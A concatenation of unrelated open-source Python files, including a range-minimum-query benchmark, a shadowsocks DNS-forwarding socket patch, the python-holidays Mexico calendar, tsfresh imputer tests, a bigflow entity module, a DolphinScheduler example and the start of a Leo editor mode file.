(numbers, queries) - both are lists
"""
with open(number_file) as f:
numbers = list(map(int, f.read().split(" ")))
with open(query_file) as f:
queries = list(map(lambda s: list(map(int, s.split(":"))),
f.read().split("\n")))
return numbers, queries
def execute_queries(numbers, queries):
"""Find the minimum of numbers array for each query"""
for start, end in queries:
minimum = numbers[start]
for i in range(start, end+1):
if numbers[i] < minimum:
minimum = numbers[i]
print(minimum)
def execute_queries2(numbers, queries):
"""Find the minimum of numbers array for each query"""
for start, end in queries:
minimum = min(numbers[start:(end+1)])
print(minimum)
def execute_queries_precompute(numbers, queries):
"""Find the minimum of numbers array for each query"""
n = len(numbers)
lookup_table = [[0 for j in range(n)] for i in range(n)]
for i in range(n):
minimum = numbers[i]
for j in range(i, n):
minimum = min(numbers[j], minimum)
lookup_table[i][j] = minimum
for start, end in queries:
print(lookup_table[start][end])
def get_parser():
"""Get a parser object."""
from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser
parser = ArgumentParser(description=__doc__,
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument("-t", "--test",
dest="test", type=int,
default=0,
help="choose a testset ")
parser.add_argument("-a", "--algorithm",
dest="algorithm",
required=True,
choices=['precomputed_table',
'execute_queries',
'execute_queries2'],
help=("choose an algorithm"))
return parser
if __name__ == "__main__":
parser = get_parser()
args = parser.parse_args()
if args.algorithm == "precomputed_table":
algorithm = execute_queries_precompute
elif args.algorithm == "execute_queries":
algorithm = execute_queries
elif args.algorithm == "execute_queries2":
algorithm = execute_queries2
else:
print("Sorry, this algorithm is not known.")
import sys
sys.exit(0)
testsets = [("Testing/10.numbers.txt", "Testing/10.10.queries.txt"),
("Testing/1000.numbers.txt",
"Testing/1000.1000000.queries.txt"),
("Testing/1000.numbers.txt",
"Testing/1000.100000000.queries.txt")]
numbers, queries = read_numbers(testsets[args.test][0],
testsets[args.test][1])
algorithm(numbers, queries)
|
shadowsocks/dns_forward/socket.py
|
dogfight360/PySocket
| 121 |
78853
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2017 Falseen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import, division, print_function, \
with_statement, nested_scopes
import sys
del sys.modules['socket']
import sys
import time
import logging
import types
import functools
path = sys.path[0]
sys.path.pop(0)
# import real socket
import socket
import struct
import binascii
sys.path.insert(0, path)
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# 原始地址和端口
orgin_addr = "172.16.58.3"
orgin_port = 53
# 修改后的地址和端口
new_dst_addr = "192.168.127.12"
new_dst_port = 53
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# 动态patch类方法
def new_class_method(_class, method_name, new_method):
method = getattr(_class, method_name)
info = sys.version_info
if info[0] >= 3:
setattr(_class, method_name,
types.MethodType(lambda *args, **kwds: new_method(method, *args, **kwds), _class))
else:
setattr(_class, method_name,
types.MethodType(lambda *args, **kwds: new_method(method, *args, **kwds), None, _class))
# 动态patch实例方法
def new_self_method(self, method_name, new_method):
method = getattr(self, method_name)
info = sys.version_info
if info[0] >= 3:
setattr(self, method_name, types.MethodType(lambda *args, **kwds: new_method(method, *args, **kwds), self))
else:
setattr(self, method_name, types.MethodType(lambda *args, **kwds: new_method(method, *args, **kwds), self, self))
def new_recvfrom(real_method, self, *args, **kwds):
data, src_addrs = real_method(*args, **kwds)
src_addr, src_port = src_addrs
if src_port == new_dst_port and src_addr == new_dst_addr:
# logging.info("fix %s:%d to %s:%d" % (src_addr, src_port, orgin_addr, orgin_port))
return data, (orgin_addr, orgin_port)
return data, src_addrs
def new_sendto(orgin_method ,self, *args, **kwds):
data, dst_addrs = args
dst_addr, dst_port = dst_addrs
if dst_port == orgin_port and dst_addr == orgin_addr :
# logging.info("forward %s:%d to %s:%d" % (dst_addr, dst_port, new_dst_addr, new_dst_port))
new_self_method(self, 'recvfrom', new_recvfrom)
args = (data, (new_dst_addr, new_dst_port))
return_value = orgin_method(*args, **kwds)
return return_value
# make a new socket class
class new_socket(socket.socket):
def __init__(self, *args, **kwds):
super(new_socket, self).__init__(*args, **kwds)
new_self_method(self, 'sendto', new_sendto)
# replace socket class to new_socket
socket.socket = new_socket
|
holidays/countries/mexico.py
|
m-ganko/python-holidays
| 654 |
78861
|
# -*- coding: utf-8 -*-
# python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Author: ryanss <<EMAIL>> (c) 2014-2017
# dr-prodigy <<EMAIL>> (c) 2017-2021
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from datetime import date
from dateutil.relativedelta import relativedelta as rd, MO
from holidays.constants import FRI, SAT, SUN
from holidays.constants import JAN, FEB, MAR, MAY, SEP, NOV, DEC
from holidays.holiday_base import HolidayBase
class Mexico(HolidayBase):
def __init__(self, **kwargs):
self.country = "MX"
HolidayBase.__init__(self, **kwargs)
def _populate(self, year):
# New Year's Day
name = "Año Nuevo [New Year's Day]"
self[date(year, JAN, 1)] = name
if self.observed and date(year, JAN, 1).weekday() == SUN:
self[date(year, JAN, 1) + rd(days=+1)] = name + " (Observed)"
# The next year's observed New Year's Day can be in this year
# when it falls on a Friday (Jan 1st is a Saturday)
if self.observed and date(year, DEC, 31).weekday() == FRI:
self[date(year, DEC, 31)] = name + " (Observed)"
# Constitution Day
name = "Día de la Constitución [Constitution Day]"
if self.observed and year >= 2007:
self[date(year, FEB, 1) + rd(weekday=MO(+1))] = (
name + " (Observed)"
)
if year >= 1917:
self[date(year, FEB, 5)] = name
# Benito Juárez's birthday
name = "<NAME> [Benito Juárez's birthday]"
if self.observed and year >= 2007:
self[date(year, MAR, 1) + rd(weekday=MO(+3))] = (
name + " (Observed)"
)
if year >= 1917:
self[date(year, MAR, 21)] = name
# Labor Day
if year >= 1923:
name = "Día del Trabajo [Labour Day]"
self[date(year, MAY, 1)] = name
if self.observed and date(year, MAY, 1).weekday() == SAT:
self[date(year, MAY, 1) + rd(days=-1)] = name + " (Observed)"
elif self.observed and date(year, MAY, 1).weekday() == SUN:
self[date(year, MAY, 1) + rd(days=+1)] = name + " (Observed)"
# Independence Day
name = "Día de la Independencia [Independence Day]"
self[date(year, SEP, 16)] = name
if self.observed and date(year, SEP, 16).weekday() == SAT:
self[date(year, SEP, 16) + rd(days=-1)] = name + " (Observed)"
elif self.observed and date(year, SEP, 16).weekday() == SUN:
self[date(year, SEP, 16) + rd(days=+1)] = name + " (Observed)"
# Revolution Day
name = "Día de la Revolución [Revolution Day]"
if self.observed and year >= 2007:
self[date(year, NOV, 1) + rd(weekday=MO(+3))] = (
name + " (Observed)"
)
if year >= 1917:
self[date(year, NOV, 20)] = name
# Change of Federal Government
# Every six years--next observance 2018
name = "Transmisión del Poder Ejecutivo Federal"
name += " [Change of Federal Government]"
if year >= 1970 and (2096 - year) % 6 == 0:
self[date(year, DEC, 1)] = name
if self.observed and date(year, DEC, 1).weekday() == SAT:
self[date(year, DEC, 1) + rd(days=-1)] = name + " (Observed)"
elif self.observed and date(year, DEC, 1).weekday() == SUN:
self[date(year, DEC, 1) + rd(days=+1)] = name + " (Observed)"
# Christmas
self[date(year, DEC, 25)] = "Navidad [Christmas]"
if self.observed and date(year, DEC, 25).weekday() == SAT:
self[date(year, DEC, 25) + rd(days=-1)] = name + " (Observed)"
elif self.observed and date(year, DEC, 25).weekday() == SUN:
self[date(year, DEC, 25) + rd(days=+1)] = name + " (Observed)"
class MX(Mexico):
pass
class MEX(Mexico):
pass
|
tests/units/transformers/test_per_column_imputer.py
|
shubhada-2019/tsfresh
| 6,596 |
78870
|
<reponame>shubhada-2019/tsfresh
# -*- coding: utf-8 -*-
# This file as well as the whole tsfresh package are licenced under the MIT licence (see the LICENCE.txt)
# <NAME> (<EMAIL>), Blue Yonder Gmbh, 2016
import warnings
from builtins import range
from unittest import TestCase
import numpy as np
import numpy.testing as npt
import pandas as pd
import pandas.testing as pdt
from sklearn.exceptions import NotFittedError
from tsfresh.transformers.per_column_imputer import PerColumnImputer
class PerColumnImputerTestCase(TestCase):
def setUp(self):
np.random.seed(0)
def test_not_fitted(self):
imputer = PerColumnImputer()
X = pd.DataFrame()
self.assertRaises(NotFittedError, imputer.transform, X)
def test_only_nans_and_infs(self):
imputer = PerColumnImputer()
X = pd.DataFrame(index=list(range(100)))
X["NaNs"] = np.nan * np.ones(100)
X["PINF"] = np.PINF * np.ones(100)
X["NINF"] = np.NINF * np.ones(100)
with warnings.catch_warnings(record=True) as w:
imputer.fit(X)
self.assertEqual(len(w), 1)
self.assertEqual(
"The columns ['NaNs' 'PINF' 'NINF'] did not have any finite values. Filling with zeros.",
str(w[0].message),
)
selected_X = imputer.transform(X)
self.assertTrue((selected_X.values == 0).all())
def test_with_numpy_array(self):
imputer = PerColumnImputer()
X = pd.DataFrame(index=list(range(100)))
X["NaNs"] = np.nan * np.ones(100)
X["PINF"] = np.PINF * np.ones(100)
X["NINF"] = np.NINF * np.ones(100)
X_numpy = X.values.copy()
with warnings.catch_warnings(record=True) as w:
imputer.fit(X)
self.assertEqual(len(w), 1)
self.assertEqual(
"The columns ['NaNs' 'PINF' 'NINF'] did not have any finite values. Filling with zeros.",
str(w[0].message),
)
selected_X = imputer.transform(X)
# re-initialize for new dicts
imputer = PerColumnImputer()
with warnings.catch_warnings(record=True) as w:
imputer.fit(X_numpy)
self.assertEqual(len(w), 1)
self.assertEqual(
"The columns [0 1 2] did not have any finite values. Filling with zeros.",
str(w[0].message),
)
selected_X_numpy = imputer.transform(X_numpy)
npt.assert_array_equal(selected_X.values, selected_X_numpy.values)
self.assertTrue(selected_X_numpy.shape, (1, 100))
def test_standard_replacement_behavior(self):
imputer = PerColumnImputer()
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_partial_preset_col_to_NINF_given(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
col_to_min = {"a": -100}
imputer = PerColumnImputer(col_to_NINF_repl_preset=col_to_min)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_partial_preset_col_to_PINF_given(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
col_to_max = {"a": 100}
imputer = PerColumnImputer(col_to_PINF_repl_preset=col_to_max)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_partial_preset_col_to_NAN_given(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
col_to_median = {"a": 1}
imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_different_shapes_fitted_and_transformed(self):
imputer = PerColumnImputer()
X = pd.DataFrame(index=list(range(10)))
X["a"] = np.ones(10)
imputer.fit(X)
X["b"] = np.ones(10)
self.assertRaises(ValueError, imputer.transform, X)
def test_preset_has_higher_priority_than_fit(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth = [-100.0, 100.0, 0.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data})
true_X = pd.DataFrame({"a": truth})
col_to_median = {"a": 0}
imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_only_parameters_of_last_fit_count(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
data_2 = [np.NINF, np.PINF, np.nan, 10.0, -10.0, 3.0, 3.0]
truth_a = [-10.0, 10.0, 3.0, 10.0, -10.0, 3.0, 3.0]
truth_b = [-10.0, 10.0, 3.0, 10.0, -10.0, 3.0, 3.0]
X = pd.DataFrame({"a": data, "b": data})
X_2 = pd.DataFrame({"a": data_2, "b": data_2})
true_X = pd.DataFrame({"a": truth_a, "b": truth_b})
imputer = PerColumnImputer()
imputer.fit(X)
imputer.fit(X_2)
selected_X = imputer.transform(X_2)
pdt.assert_frame_equal(selected_X, true_X)
def test_only_subset_of_columns_given(self):
data = [np.NINF, np.PINF, np.nan, 100.0, -100.0, 1.0, 1.0]
truth_a = [-100.0, 100.0, 0.0, 100.0, -100.0, 1.0, 1.0]
truth_b = [-100.0, 100.0, 1.0, 100.0, -100.0, 1.0, 1.0]
X = pd.DataFrame({"a": data, "b": data})
true_X = pd.DataFrame({"a": truth_a, "b": truth_b})
col_to_median = {"a": 0}
imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
imputer.fit(X)
selected_X = imputer.transform(X)
pdt.assert_frame_equal(selected_X, true_X)
def test_NINF_preset_contains_more_columns_than_dataframe_to_fit(self):
X = pd.DataFrame(index=list(range(10)))
X["a"] = np.ones(10)
col_to_min = {"a": 0, "b": 0}
imputer = PerColumnImputer(col_to_NINF_repl_preset=col_to_min)
self.assertRaises(ValueError, imputer.fit, X)
def test_PINF_preset_contains_more_columns_than_dataframe_to_fit(self):
X = pd.DataFrame(index=list(range(10)))
X["a"] = np.ones(10)
col_to_max = {"a": 0, "b": 0}
imputer = PerColumnImputer(col_to_PINF_repl_preset=col_to_max)
self.assertRaises(ValueError, imputer.fit, X)
def test_NAN_preset_contains_more_columns_than_dataframe_to_fit(self):
X = pd.DataFrame(index=list(range(10)))
X["a"] = np.ones(10)
col_to_median = {"a": 0, "b": 0}
imputer = PerColumnImputer(col_to_NAN_repl_preset=col_to_median)
self.assertRaises(ValueError, imputer.fit, X)
|
bigflow_python/python/bigflow/core/entity.py
|
advancedxy/bigflow_python
| 1,236 |
78877
|
<gh_stars>1000+
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015 Baidu, Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Python Implementation of Flume Entity. Entity is
"""
import copy
import pickle
import threading
import os
import uuid
import atexit
import subprocess
from bigflow import error
from bigflow import pcollection, ptable, pobject
from bigflow.core.serde import cloudpickle
from bigflow.util.log import logger
_mutex = threading.Lock()
_entity_id = 0
ENTITY_FOLDER_BASE= "entity-" + str(uuid.uuid1())
ENTITY_FOLDER = os.path.normpath(os.path.join(os.getcwd(), ENTITY_FOLDER_BASE))
FLUME_WORKER_ENTITY_FOLDER = ENTITY_FOLDER_BASE
ONE_MEGA_BYTES = 1024 * 1024
ENTITY_PROTO_SIZE_LIMIT = ONE_MEGA_BYTES
def _to_proto_message_wrapper(func):
"""wraps to_proto_message funcs
1. increase global counter
2. size > 1M, output config to a file
"""
def _wrapper(self, *args, **kwargs):
"""inner wrapper"""
import sys
import os
proto = func(self, *args, **kwargs)
with _mutex:
proto.id = sys.modules[__name__]._entity_id
sys.modules[__name__]._entity_id += 1
if (proto.ByteSize() > ENTITY_PROTO_SIZE_LIMIT):
# output to a file
if hasattr(self, "get_entity_name"):
name = self.get_entity_name()
else:
name = self.__class__.__name__
folder = sys.modules[__name__].ENTITY_FOLDER
file = os.path.join(folder, "_".join([name, str(uuid.uuid1())]))
with open(file, 'wb') as fd:
fd.write(proto.config)
# clear config filed
proto.ClearField('config')
proto.config_file = (
os.path.join(FLUME_WORKER_ENTITY_FOLDER, os.path.basename(file)))
return proto
return _wrapper
class EntitiedBySelf(object):
"""
An entity that returns given entity_name and entity_config
"""
def __init__(self):
pass
def get_entity_name(self):
"""
Get entity_name of this entity
Raises:
NotImplementedError: if not implemented
"""
raise NotImplementedError
def get_entity_config(self):
"""
Get entity_config of this entity
Raises:
NotImplementedError: if not implemented
"""
raise NotImplementedError
class Entity(object):
"""
A wrapper of serializable operators of Flume.
"""
loader = "PythonLoaderDelegator"
processor = "PythonProcessorDelegator"
objector = "PythonObjectorDelegator"
sinker = "PythonSinkerDelegator"
key_reader = "PythonKeyReaderDelegator"
partitioner = "PythonPartitionerDelegator"
sort_key_reader = "StrKeyReaderDelegator"
window = "PythonWindowFnDelegator"
trigger = "PythonTriggerDelegator"
time_reader = "PythonTimeReaderDelegator"
def __init__(self, name="", operator=None, message=None):
if message is None:
if len(name) == 0:
raise error.InvalidLogicalPlanException("Invalid name for entity.")
if operator is None:
raise error.InvalidLogicalPlanException("Invalid operator(None) for entity.")
if isinstance(operator, EntitiedBySelf):
self.__name = operator.get_entity_name()
self.__config = operator.get_entity_config()
elif isinstance(operator, str):
self.__name = name
self.__config = operator
else:
self.__name = name
self.__config = cloudpickle.dumps(operator)
else:
self.from_proto_message(message)
def is_empty(self):
return not self.__name or len(self.__name) == 0
@property
def config(self):
""" return config """
return self.__config
@property
def name(self):
""" return name """
return self.__name
def from_proto_message(self, message):
from bigflow.core import entity_names
for key, value in entity_names.__dict__.items():
if isinstance(key, str) and isinstance(value, str) and value == message.name:
self.__name = key
if self.__name is None:
raise error.InvalidLogicalPlanException("Invalid name/type for entity.")
self.__config = message.config
@_to_proto_message_wrapper
def to_proto_message(self):
from flume.proto import entity_pb2
from bigflow.core import entity_names
message = entity_pb2.PbEntity()
message.name = entity_names.__dict__[self.__name]
message.config = self.__config
return message
@staticmethod
def of(name, operator):
if isinstance(operator, Entity):
return operator
return Entity(name, operator)
@staticmethod
def from_message(pb_message):
return Entity(message=pb_message)
def create_and_setup(self):
if self.is_empty():
raise error.InvalidLogicalPlanException("Empty entity")
instance = pickle.loads(self.__config)
return instance
def __eq__(self, other):
if isinstance(other, Entity):
return self.__name == other.__name and self.config == other.__config
return False
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(self.__name) ^ hash(self.__config) ^ hash((self.__name, self.__config))
class PythonTimeReaderDelegator(EntitiedBySelf):
""" PythonTimeReaderDelegator """
def __init__(self, functor):
self._fn = Functor.of(functor)
def get_entity_name(self):
return "PythonTimeReaderDelegator"
def get_entity_config(self):
return self._fn.to_proto_message().SerializeToString()
class Functor(object):
def to_proto_message(self):
raise NotImplementedError()
def expect_iterable(self):
pass
@staticmethod
def of(fn):
"""
if fn is a Functor, return itself
if is callable, we will wrap it as a PyFn
otherwise, we will create a fn who return a deepcopy of the param
NOTE: !!!!copy.deepcopy CANNOT be changed!!!
"""
if isinstance(fn, Functor):
return fn
elif callable(fn):
return PyFn(fn)
else:
return PyFn(lambda *p: copy.deepcopy(fn))
class PyFn(Functor):
def __init__(self, fn):
self.__fn = fn
self.__expect_iterable = False
def expect_iterable(self):
self.__expect_iterable = True
@_to_proto_message_wrapper
def to_proto_message(self):
from flume.proto import entity_pb2
from bigflow.core import entity_names
pb_entity = entity_pb2.PbEntity()
pb_entity.name = entity_names.__dict__['PythonImplFunctor']
config = {}
config['fn'] = self.__fn
config['expect_iterable'] = self.__expect_iterable
pb_entity.config = cloudpickle.dumps(config)
return pb_entity
class CppFunctor(Functor):
def name(self):
return type(self).__name__
def config(self):
"""config"""
return ""
@_to_proto_message_wrapper
def to_proto_message(self):
from flume.proto import entity_pb2
from bigflow.core import entity_names
pb_entity = entity_pb2.PbEntity()
pb_entity.name = entity_names.__dict__[self.name()]
pb_entity.config = self.config()
return pb_entity
class CartesianFn(CppFunctor):
pass
class FullJoinInitializeFn(CppFunctor):
pass
class FullJoinTransformFn(CppFunctor):
pass
class FullJoinFinalizeFn(CppFunctor):
pass
class OneSideJoinFn(CppFunctor):
pass
class ExtractValueFn(CppFunctor):
pass
class Partitioner(EntitiedBySelf):
def __init__(self, partition_fn):
self.partition = partition_fn
def get_entity_config(self):
return cloudpickle.dumps(self)
def get_entity_name(self):
return "PythonPartitionerDelegator"
class BucketPartitioner(EntitiedBySelf):
""" BucketPartitioner Entity Delegator """
def __init__(self, bucket_size=1000):
self.bucket_size = bucket_size
def get_entity_config(self):
""" inner functor """
from bigflow_python.proto import entity_config_pb2
pb = entity_config_pb2.PbBucketPartitionerConfig()
pb.bucket_size = self.bucket_size
return pb.SerializeToString()
def get_entity_name(self):
""" inner functor """
return "BucketPartitioner"
class SelfNamedEntityBase(EntitiedBySelf):
def get_entity_name(self):
""" return child class name """
return type(self).__name__
def get_entity_config(self):
"""
Get entity_config of this entity
"""
return ""
class PythonEnvironment(SelfNamedEntityBase):
pass
class Processor(EntitiedBySelf):
def __init__(self, *fns):
self.__fns = fns
self.__normal_input_num = 1
self.__config = None
self.__side_inputs = []
def normal_input_num(self, n = None):
if n is None:
return self.__normal_input_num
self.__normal_input_num = n
def set_config(self, config):
self.__config = config
def get_entity_config(self):
from bigflow_python.proto import processor_pb2
processor = processor_pb2.PbPythonProcessorConfig()
if self.__config is not None:
processor.config = cloudpickle.dumps(self.__config)
for fn in self.__fns:
fn = Functor.of(fn)
processor.functor.add().CopyFrom(fn.to_proto_message())
for side_input in self.__side_inputs:
side_input_type = processor_pb2.POBJECT_TYPE
if isinstance(side_input, pcollection.PCollection):
side_input_type = processor_pb2.PCOLLECTION_TYPE
processor.side_input_type.append(side_input_type)
return processor.SerializeToString()
def get_entity_name(self):
return type(self).__name__
def set_side_inputs(self, *side_inputs):
self.__side_inputs = side_inputs
return self
class FlatMapProcessor(Processor):
def __init__(self, fn):
fn = Functor.of(fn)
fn.expect_iterable()
super(FlatMapProcessor, self).__init__(fn)
class FilterProcessor(Processor):
def __init__(self, fn, *side_inputs):
fn = Functor.of(fn)
super(FilterProcessor, self).__init__(fn)
self.set_side_inputs(*side_inputs)
class MapProcessor(Processor):
def __init__(self, fn):
fn = Functor.of(fn)
super(MapProcessor, self).__init__(fn)
def get_entity_name(self):
return "FlatMapProcessor"
class CombineProcessor(Processor):
def __init__(self, fn):
super(CombineProcessor, self).__init__(fn)
self.normal_input_num(0)
class ReduceProcessor(Processor):
def __init__(self, fn):
super(ReduceProcessor, self).__init__(fn)
class AccumulateProcessor(Processor):
def __init__(self, zero_fn, accumulate_fn):
super(AccumulateProcessor, self).__init__(zero_fn, accumulate_fn)
class CountProcessor(Processor):
def __init__(self):
super(CountProcessor, self).__init__()
class SumProcessor(Processor):
def __init__(self):
super(SumProcessor, self).__init__()
class TakeProcessor(Processor):
def __init__(self, n):
if isinstance(n, pobject.PObject):
super(TakeProcessor, self).__init__()
self.set_side_inputs(n)
else:
super(TakeProcessor, self).__init__()
self.set_config(n)
class SelectElementsProcessor(Processor):
def __init__(self, n, order, key_fn = None):
if key_fn is None:
super(SelectElementsProcessor, self).__init__()
else:
super(SelectElementsProcessor, self).__init__(key_fn)
d = {}
if isinstance(n, pobject.PObject):
self.set_side_inputs(n)
d["num"] = -1
else:
d["num"] = n
d["order"] = order
self.set_config(d)
class TransformProcessor(Processor):
def __init__(self, status_serde, initialize_fn, transform_fn, finalize_fn):
msg = Entity.of(Entity.objector, status_serde).to_proto_message()
super(TransformProcessor, self).__init__(initialize_fn, transform_fn, finalize_fn)
self.set_config(msg.SerializeToString())
class FlattenProcessor(Processor):
def __init__(self, serde):
msg = Entity.of(Entity.objector, serde).to_proto_message()
super(FlattenProcessor, self).__init__()
#print len(msg.SerializeToString())
self.set_config(msg.SerializeToString())
class GetLastKeyProcessor(Processor):
def __init__(self, deserialize_fn):
super(GetLastKeyProcessor, self).__init__(deserialize_fn)
class ValueProcessor(Processor):
def __init__(self, fn):
if fn is None:
fn = ExtractValueFn()
fn = Functor.of(fn)
super(ValueProcessor, self).__init__(fn)
def get_entity_name(self):
return "FlatMapProcessor"
class PipeProcessor(Processor):
""" PipeProcessor """
def __init__(self, command, **kargs):
super(PipeProcessor, self).__init__()
config = dict()
config['is_nested_ptype'] = kargs.get('is_nested_ptype', False)
config['command'] = command
# default buffer size 64M
config['buffer_size'] = kargs.get('buffer_size', 64 * 1024 * 1024)
config['type'] = kargs.get('type', 'streaming')
config['field_delimiter'] = kargs.get('field_delimiter', '\t')
config['line_delimiter'] = kargs.get('line_delimiter', '\n')
config['input_fields_num'] = kargs.get('input_fields_num', 1)
config['output_fields_num'] = kargs.get('output_fields_num', 1)
self.set_config(config)
class BarshalObjector(EntitiedBySelf):
""" BarshalObjector """
def get_entity_name(self):
""" get name """
return "BarshalObjector"
def get_entity_config(self):
""" get config """
return ''
class SplitStringToTypes(CppFunctor):
def __init__(self, sep, fields_type, ignore_overflow, ignore_illegal_line):
"""
接受一行python字符串, 分割符号,每列对应的python类型
将字符串按分隔符分割,并将每一列转化为对应的python类型
Args:
seq: Python string, 分割符
fields_type: Python type, 每列对应的python类型
ignore_overflow: Python boolean, 是否允许文件列数多于字段数
ignore_illegal_line: Python boolean, 是否允许文件列数小于字段数时忽略该行
"""
self._sep = sep
self._fields_type = fields_type
self._ignore_overflow = ignore_overflow
self._ignore_illegal_line = ignore_illegal_line
def config(self):
""" Config: Pass sep, fields_type arguments to cpp runtime"""
return cloudpickle.dumps((self._sep, self._fields_type,
self._ignore_overflow, self._ignore_illegal_line))
class SerdeWrapper(CppFunctor):
"""SerdeWrapper"""
def __init__(self, objector, is_serialize=True, apply_tuple_index=-1):
self._is_serialize = is_serialize
self._objector = objector
self._apply_index = apply_tuple_index
def config(self):
"""Config: Pass serialized arguments to cpp runtime"""
return cloudpickle.dumps((self._is_serialize, self._objector, self._apply_index))
class KVDeserializeFn(CppFunctor):
"""Deserialize function for (Key, Value"""
def __init__(self, *deserializers):
self.deserializers = deserializers
def config(self):
"""Pass deserializers to cpp runtime"""
return cloudpickle.dumps(self.deserializers)
class KVSerializeFn(CppFunctor):
"""serialize function for (Key, Value"""
def __init__(self, *serializers):
self.serializers = serializers
def config(self):
"""Pass serializers to cpp runtime"""
return cloudpickle.dumps(self.serializers)
# please add normal code before following code
def clear_folder(name):
"""clear folder when exists."""
logger.debug("deleting folder %s." % ENTITY_FOLDER)
subprocess.call("command rm -rf %s" % ENTITY_FOLDER, shell=True)
subprocess.check_call("command mkdir %s" % ENTITY_FOLDER, shell=True)
# when python exits, folder will be deleted
atexit.register(clear_folder, ENTITY_FOLDER)
# EOF
|
dolphinscheduler-python/pydolphinscheduler/examples/task_dependent_example.py
|
swg-liuge/dolphinscheduler
| 2,086 |
78892
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
r"""
A example workflow for task dependent.
This example will create two workflows named `task_dependent` and `task_dependent_external`.
`task_dependent` is true workflow define and run task dependent, while `task_dependent_external`
define outside workflow and task from dependent.
After this script submit, we would get workflow as below:
task_dependent_external:
task_1
task_2
task_3
task_dependent:
task_dependent(this task dependent on task_dependent_external.task_1 and task_dependent_external.task_2).
"""
from pydolphinscheduler.constants import ProcessDefinitionDefault
from pydolphinscheduler.core.process_definition import ProcessDefinition
from pydolphinscheduler.tasks.dependent import And, Dependent, DependentItem, Or
from pydolphinscheduler.tasks.shell import Shell
with ProcessDefinition(
name="task_dependent_external",
tenant="tenant_exists",
) as pd:
task_1 = Shell(name="task_1", command="echo task 1")
task_2 = Shell(name="task_2", command="echo task 2")
task_3 = Shell(name="task_3", command="echo task 3")
pd.submit()
with ProcessDefinition(
name="task_dependent_example",
tenant="tenant_exists",
) as pd:
task = Dependent(
name="task_dependent",
dependence=And(
Or(
DependentItem(
project_name=ProcessDefinitionDefault.PROJECT,
process_definition_name="task_dependent_external",
dependent_task_name="task_1",
),
DependentItem(
project_name=ProcessDefinitionDefault.PROJECT,
process_definition_name="task_dependent_external",
dependent_task_name="task_2",
),
)
),
)
pd.submit()
|
leo/modes/bbj.py
|
ATikhonov2/leo-editor
| 1,550 |
78916
|
<gh_stars>1000+
# Leo colorizer control file for bbj mode.
# This file is in the public domain.
# Properties for bbj mode.
properties = {
"commentEnd": "*/",
"commentStart": "/*",
"wordBreakChars": ",+-=<>/?^&*",
}
# Attributes dict for bbj_main ruleset.
bbj_main_attributes_dict = {
"default": "null",
"digit_re": "",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Dictionary of attributes dictionaries for bbj mode.
attributesDictDict = {
